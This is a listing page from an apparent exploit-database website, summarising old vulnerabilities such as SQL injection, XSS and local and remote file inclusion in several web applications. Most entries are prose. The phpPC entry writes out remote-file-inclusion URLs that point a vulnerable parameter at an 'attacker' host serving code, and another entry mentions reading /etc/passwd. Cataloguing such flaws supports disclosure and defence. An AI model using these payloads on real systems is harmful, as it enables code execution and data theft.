header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability

fipsGallery version 1.5 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Zyxel Prestige 660H-61 ADSL Router Cross-Site Scripting Vulnerability

The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into the vulnerable fipsCMS v4.5 application. The exploit is triggered when the vulnerable application receives a specially crafted HTTP request containing malicious SQL code. This code is then executed in the backend database, allowing the attacker to gain access to sensitive information such as passwords.

phpPC 1.04 Multiples Remote File Inclusion

phpPC 1.04 is vulnerable to multiple Remote File Inclusion vulnerabilities. The vulnerable files are poll.php, poll_kommentar.php and poll_sm.php. In poll.php, the vulnerable code is located at line 13, in poll_kommentar.php, the vulnerable code is located at line 18 and in poll_sm.php, the vulnerable code is located at line 8. An attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application. For example, in poll.php, an attacker can send a malicious URL like http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?. Similarly, in poll_kommentar.php, an attacker can send a malicious URL like http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt? and in poll_sm.php, an attacker can send a malicious URL like http://localhost/pcc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://attacker/inject.txt?.

Pearl Forums

The Pearl Forums application is vulnerable to Insecure Direct Object Reference due to the lack of proper input validation. This allows an attacker to inject malicious code into the application by manipulating the 'templatesDirectory' parameter in the vulnerable scripts such as admin.php, password.php, profile.php, merge.php, and adminPolls.php.

aBitWhizzy [local file include]

aBitWhizzy is a web application developed by Unverse.net. It is vulnerable to a Local File Include vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. This can allow the attacker to include a local file on the server, such as the /etc/passwd file. This can lead to the disclosure of sensitive information.

Forum 5 Local File-Include Vulnerability

Forum 5 is prone to a local file-include vulnerability. The application fails to sanitize user input when executing the script. In particular the script fails to check for the presence of a directory-traversal sequence ('../'). A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.

Recent Exploits: